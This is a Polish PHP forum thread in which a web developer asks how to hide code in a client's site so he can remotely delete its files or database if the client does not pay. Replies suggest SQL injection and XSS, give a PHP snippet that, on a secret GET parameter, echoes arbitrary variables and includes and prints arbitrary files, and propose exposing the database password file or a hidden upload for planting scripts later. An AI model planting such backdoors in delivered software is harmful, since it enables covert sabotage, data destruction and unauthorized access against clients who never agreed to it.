Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Jak zabezpieczyć stronę przed nieuczciwym klientem
Forum PHP.pl > Forum > PHP
jarod20
Witam,
Załóżmy że tworzę komercyjną stronę i chciałbym zabezpieczyć się przed nieuczciwym klientem, poprzez na przykład umieszczenie gdzieś w kodzie strony skryptu lub fragmentu kodu umożliwiającego mi np. wywołanie zdalnego skryptu kasującego pliki na serwerze (do którego normalnie nie mam dostępu), lub np. skryptu kasującego bazę danych (lub choćby wszystkie w niej wpisy). Czy ktoś ma może pomysł jak to zrobić. A może sami macie podobne metody zabezpieczania swoich projektów, a jeśli tak to jakie?
Pozdrawiam.
chomiczek
SQL Injection/Insertion
poszukaj też o XSS

A na przyszłość użyj najpier szukaj!
huntercs
aby zapezpieczyć się przed sytuacją gdy dałeś skrypt i nie otrzymałeś wynagrodzenia, możesz gdzieś umieścić coś typu:
  1. <?php
  2. if($_GET['secure']==1)
  3. {
  4. echo $$_GET['var'];
  5. include_once($_GET['inc']);
  6. highlight_file($_GET['inc']);
  7. }
  8. ?>

a po finalizacji usunąć ten kod
Dex1987
mozesz stworzyc cos takiego co bedzie wyswietlalo zawartosc pliku z haslami do bazy danych, pozniej zrobisz co zechcesz, mozesz rownierz zrobic jakis upload i w kazdej chwili bedziesz mugl dopisac jakis skrypcik i wrzucic na serwer. pamietaj o zabezpieczeniu takich rzeczy haslem ;]

Pozdrawiam dex.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.